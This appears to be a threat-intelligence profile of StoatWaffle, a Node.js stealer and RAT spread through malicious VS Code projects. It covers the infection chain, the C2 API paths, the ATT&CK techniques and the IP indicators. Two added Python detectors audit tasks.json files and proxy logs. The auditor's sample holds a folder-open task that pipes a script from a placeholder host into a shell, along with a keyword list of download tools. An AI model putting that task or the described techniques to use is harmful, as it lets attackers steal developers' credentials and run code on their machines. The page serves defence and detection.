StoatWaffle
StoatWaffle is a modular Node.js malware family used by the North Korea-linked threat actor tracked as WaterPlum, also known as Team 8, Moralis, and the Modilus family, as part of the Contagious Interview campaign. Public reporting states the malware began being used around December 2025 and is distributed through malicious Microsoft Visual Studio Code projects that abuse .vscode/tasks.json auto-run functionality, specifically the runOn: folderOpen option, so code executes when a victim opens and trusts a repository. The lures are described as blockchain- or developer-themed projects, including fake job interview scenarios targeting developers, especially personnel with access to source code and sensitive systems.
The infection chain is multi-stage. A malicious VS Code task downloads and executes a script, including from Vercel-hosted infrastructure, checks whether Node.js is installed, installs it from the official site if necessary, and launches an initial loader such as env.npl. That loader polls a command-and-control server at regular intervals, executes received Node.js code, and launches a second downloader that retrieves the main StoatWaffle modules.
Reported StoatWaffle functionality includes at least two primary modules: an information stealer and a remote access trojan (RAT). The stealer module targets credentials and data from Chromium-based browsers and Mozilla Firefox, including browser extension data. In Firefox environments it reads extensions.json and checks extension names for designated keywords. On macOS, reporting states it steals Keychain or iCloud Keychain database data. It also copies stolen data to a temporary directory and uploads it to the C2 server. The malware can detect when it is running inside Windows Subsystem for Linux and access Windows user data from WSL. Reporting also notes collection of installed software information.
The RAT module maintains communication with attacker-controlled C2 infrastructure and supports remote operations including listing files and directories, retrieving directory details, changing the working directory, navigating to the application directory, recursively searching directories, uploading files, listing or uploading files matching keywords, executing arbitrary shell commands, executing arbitrary Node.js code, and terminating its own process.
High-confidence infrastructure indicators reported for this family include the IP addresses 185.163.125.196, 147.124.202.208, 163.245.194.216, 66.235.168.136, and 87.236.177.9.
Groups observed using it
4 distinct threat actors attributed by public researchers.
The malware, dubbed StoatWaffle, has been attributed to a group tracked as WaterPlum, also known as Team 8, Moralis, or the Modilus family. The malware is a modular implant written in Node.js and includes capabilities for stealing credentials and providing remote access to compromised systems.
Techniques & procedures
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains a .vscode directory that contains a tasks.json file. If a user opens and trusts this malicious repository with VSCode, it reads this tasks.json file.
Execution
5 techniques
The RAT Module... include[s] the ability to list files, execute shell commands, upload files, and run arbitrary Node.js code.
This task downloads and executes a batch file from a web application hosted on Vercel.
The malware is a modular implant written in Node.js... When it receives a response, it executes the embedded Node.js code, which launches a second downloader.
This file uses the runOn: folderOpen option, which instructs VS Code to execute a defined task as soon as the folder is opened and trusted by the user.
The attack begins when a developer opens a malicious repository, disguised as a blockchain-related project, in VS Code. The project contains a .vscode directory with a specially crafted tasks.json file.
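The auto-run mechanism described above (a task in .vscode/tasks.json with runOn: folderOpen, executed once the folder is opened and trusted) is something a defender can audit before a repository is ever opened in VS Code. The following is an added example, not code from the vendor reporting or from Mallory: a small Python auditor that parses a tasks.json file, flags tasks configured to run on folder open, and separately notes commands that look like download-and-execute. The download hints, the JSONC handling and the sample tasks.json (including the example.invalid host) are constructed for illustration and are not indicators from the reporting.

```python
"""Audit a repository's .vscode/tasks.json for auto-run tasks.

Added example (not the vendor's or Mallory's code). VS Code reads this
file as JSONC (comments and trailing commas allowed), so the parser
strips those before handing the text to json.loads.
"""
import json
import re
import sys

# Substrings suggesting a task fetches or evaluates remote content.
# Constructed heuristics, not indicators taken from the reporting.
DOWNLOAD_HINTS = ("curl", "wget", "invoke-webrequest", "powershell",
                  "http://", "https://", "node -e", "bash -c", "cmd /c")


def strip_jsonc(text):
    """Remove // and /* */ comments that sit outside string literals, then
    drop trailing commas, so a VS Code JSONC file parses as plain JSON."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):       # line comment
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):       # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing-comma removal is a simple regex; good enough for tasks files.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def load_tasks(text):
    """Return the list of task objects from a tasks.json document."""
    return json.loads(strip_jsonc(text)).get("tasks", [])


def task_command(task):
    """Flatten command and args (VS Code allows string or {value:...} forms)."""
    cmd = task.get("command", "")
    if isinstance(cmd, dict):
        cmd = cmd.get("value", "")
    args = [a.get("value", "") if isinstance(a, dict) else str(a)
            for a in task.get("args", [])]
    return " ".join(p for p in [str(cmd)] + args if p)


def audit_tasks(text):
    """Flag tasks that auto-run on folder open and/or look like downloaders.

    Returns one finding per suspicious task; an auto-run task whose command
    also carries a download hint is rated high, anything else medium."""
    findings = []
    for task in load_tasks(text):
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        cmd = task_command(task)
        hints = [h for h in DOWNLOAD_HINTS if h in cmd.lower()]
        if auto_run or hints:
            findings.append({
                "label": task.get("label", "<unnamed>"),
                "type": task.get("type"),
                "auto_run": auto_run,
                "command": cmd,
                "hints": hints,
                "severity": "high" if auto_run and hints else "medium",
            })
    return findings


# Constructed sample: one ordinary build task and one folder-open task that
# pipes a remote script into a shell. example.invalid is a placeholder host.
SAMPLE_TASKS_JSON = r'''{
  // Constructed sample tasks.json for the audit example
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "env",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}'''

if __name__ == "__main__":
    # Usage: python audit_tasks.py [path/to/.vscode/tasks.json]
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TASKS_JSON
    for f in audit_tasks(text):
        print(f"[{f['severity']}] task '{f['label']}' auto_run={f['auto_run']} "
              f"hints={f['hints']} command={f['command']!r}")
```

Run it against a cloned repository's .vscode/tasks.json before opening the folder in VS Code; a finding with auto_run set is worth treating as untrusted regardless of what the command looks like, since the page notes that later variants changed the download host (Vercel to GitHub Gist) while keeping the same folder-open trigger.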
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
1 technique
Credential Access
5 techniques
Stealer Module: This component is designed to exfiltrate credentials and data from Chromium-based browsers and Mozilla Firefox. It also targets browser extension data.
Stealer Module: This component is designed to exfiltrate credentials and data from Chromium-based browsers and Mozilla Firefox.
If the victim OS is macOS, it also steals the Keychain database.
Stealer module steals credentials stored in web browsers and designated browser extension data and uploads them to the C2 server.
If the victim OS is macOS, it also steals the Keychain database.
Discovery
5 techniques
One module acts as a stealer, collecting credentials from browsers, extension data, installed software details...
The RAT Module... include[s] the ability to list files, execute shell commands, upload files, and run arbitrary Node.js code.
If the victim browser is Firefox, it steals browser extension data besides stored credentials. It reads extensions.json and gets the list of browser extension names, then checks whether the designated keyword is included.
The stealer can also detect if it is running in a Windows Subsystem for Linux (WSL) environment and access Windows user data from within the Linux instance.
This initial script checks if Node.js is installed on the victim’s system and, if not, downloads and installs it from the official website.
Collection
1 technique
On macOS systems, the module additionally steals the iCloud Keychain database. The stolen data is copied to a temporary directory and uploaded to the C2 server.
Command and Control
4 techniques
The RAT module maintains regular communication with an attacker-controlled C2 server, executing commands to terminate its own process, change the working directory, list files and directories, navigate to the application directory, retrieve directory details, upload a file, execute Node.js code, and run arbitrary shell commands, among others.
env.npl is the first-stage downloader of StoatWaffle. It connects to /api/errorMessage on the C2 server at 5-second intervals... The second-stage downloader... connects to the path /api/handleErrors every 5 seconds.... The RAT module communicates with the C2 server periodically; when it receives a command from `/api/hsocketNext`, it executes it and sends the result to /api/hsocketResult.
This task downloads and executes a batch file from a web application hosted on Vercel... It then fetches and runs env.npl, the initial loader for the StoatWaffle malware.
Another module works as a remote access trojan (RAT), allowing attackers to run commands on the infected system and receive results.
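The C2 behaviour quoted above gives a defender three concrete signals: the reported C2 IP addresses, the four API paths used by the two downloaders and the RAT module, and a fixed 5-second polling interval. The following is an added example, not code from the vendor reporting or from Mallory, showing how those signals can be applied to web proxy logs. It flags flows to the reported IPs, flows to the reported paths, and any client that polls the same destination path at roughly 5-second cadence, so it still fires when the hosting changes but the polling logic does not. The log format, the sample log lines, the request methods and the non-C2 addresses (203.0.113.7, 198.51.100.x, 10.0.0.x) are constructed for illustration; only the C2 IPs and paths come from the reporting.

```python
"""Flag StoatWaffle-style C2 polling in proxy logs.

Added example (not the vendor's or Mallory's code). Log format is a
constructed "<iso-timestamp> <src-ip> <dst-ip> <method> <path>" line.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# IP addresses reported as C2 infrastructure for this family.
REPORTED_C2_IPS = {"185.163.125.196", "147.124.202.208", "163.245.194.216",
                   "66.235.168.136", "87.236.177.9"}

# Paths reported for the first-stage downloader, second-stage downloader
# and RAT module (command fetch and result upload).
REPORTED_C2_PATHS = {"/api/errorMessage", "/api/handleErrors",
                     "/api/hsocketNext", "/api/hsocketResult"}

REPORTED_POLL_SECONDS = 5.0   # polling interval stated in the reporting
CADENCE_TOLERANCE = 1.0       # assumption: allow +/- 1 s of jitter
MIN_REQUESTS_FOR_CADENCE = 3  # assumption: need at least two intervals

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<path>\S+)$")


def parse_line(line):
    """Parse one constructed log line; return None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def analyze(lines):
    """Group requests per (src, dst, path) flow and return alerts.

    Each alert carries the flow key, the request count and the reasons that
    fired: known_c2_ip, known_c2_path and/or beacon_5s."""
    flows = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            flows[(rec["src"], rec["dst"], rec["path"])].append(rec["ts"])

    alerts = []
    for (src, dst, path), stamps in flows.items():
        reasons = []
        if dst in REPORTED_C2_IPS:
            reasons.append("known_c2_ip")
        if path in REPORTED_C2_PATHS:
            reasons.append("known_c2_path")
        stamps.sort()
        if len(stamps) >= MIN_REQUESTS_FOR_CADENCE:
            gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
            # Median is robust to one delayed request in an otherwise regular poll.
            if abs(median(gaps) - REPORTED_POLL_SECONDS) <= CADENCE_TOLERANCE:
                reasons.append("beacon_5s")
        if reasons:
            alerts.append({"src": src, "dst": dst, "path": path,
                           "count": len(stamps), "reasons": reasons})
    return alerts


# Constructed sample: one host polling a reported path every 5 s on an
# unlisted server, one benign request, and one contact to a reported IP.
SAMPLE_LOG = """2025-12-10T09:00:00 10.0.0.5 203.0.113.7 POST /api/errorMessage
2025-12-10T09:00:05 10.0.0.5 203.0.113.7 POST /api/errorMessage
2025-12-10T09:00:10 10.0.0.5 203.0.113.7 POST /api/errorMessage
2025-12-10T09:00:15 10.0.0.5 203.0.113.7 POST /api/errorMessage
2025-12-10T09:00:03 10.0.0.8 198.51.100.20 GET /index.html
2025-12-10T09:01:00 10.0.0.9 87.236.177.9 GET /
"""

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG.splitlines()):
        print(f"{a['src']} -> {a['dst']}{a['path']} x{a['count']}: "
              f"{', '.join(a['reasons'])}")
```

The cadence check is deliberately separate from the indicator lookups: the IP list ages quickly and the page itself notes that newer VS Code project variants moved from Vercel to GitHub Gist hosting, whereas a loader that polls a fixed path every 5 seconds is a behaviour that survives infrastructure changes. Tune MIN_REQUESTS_FOR_CADENCE and CADENCE_TOLERANCE to your log volume; both values here are assumptions.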
Exfiltration
2 techniques
The stolen data is copied to a temporary directory and uploaded to the C2 server.
Newer mutations of the VS Code projects have eschewed Vercel-based domains for GitHub Gist-hosted scripts to download and execute next-stage payloads.
IOCs tracked for this family
5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
5 sources tracked across advisories, community write-ups, and news.
A modular Node.js malware family delivered via malicious VS Code projects abusing auto-run tasks.json. It uses a multi-stage infection chain with a loader/downloader, a credential and browser-extension data stealer, and a RAT module for remote command execution. It can steal macOS Keychain data and access Windows data through WSL environments.
StoatWaffle is a malware family with RAT and credential-stealing functionality. It communicates with a C2 server, executes commands, uploads files, runs Node.js and shell commands, steals stored browser credentials and browser extension data from Chromium and Firefox, and targets macOS Keychain databases.
A modular Node.js malware family distributed through malicious VS Code projects. It uses auto-run tasks to download payloads, install Node.js if needed, launch staged downloaders, and deploy stealer and RAT modules. The stealer targets browser credentials, extension data, and on macOS the iCloud Keychain database; the RAT executes commands, uploads files, searches directories, and runs shell or Node.js code.
Named as malware used in the Contagious Interview campaign.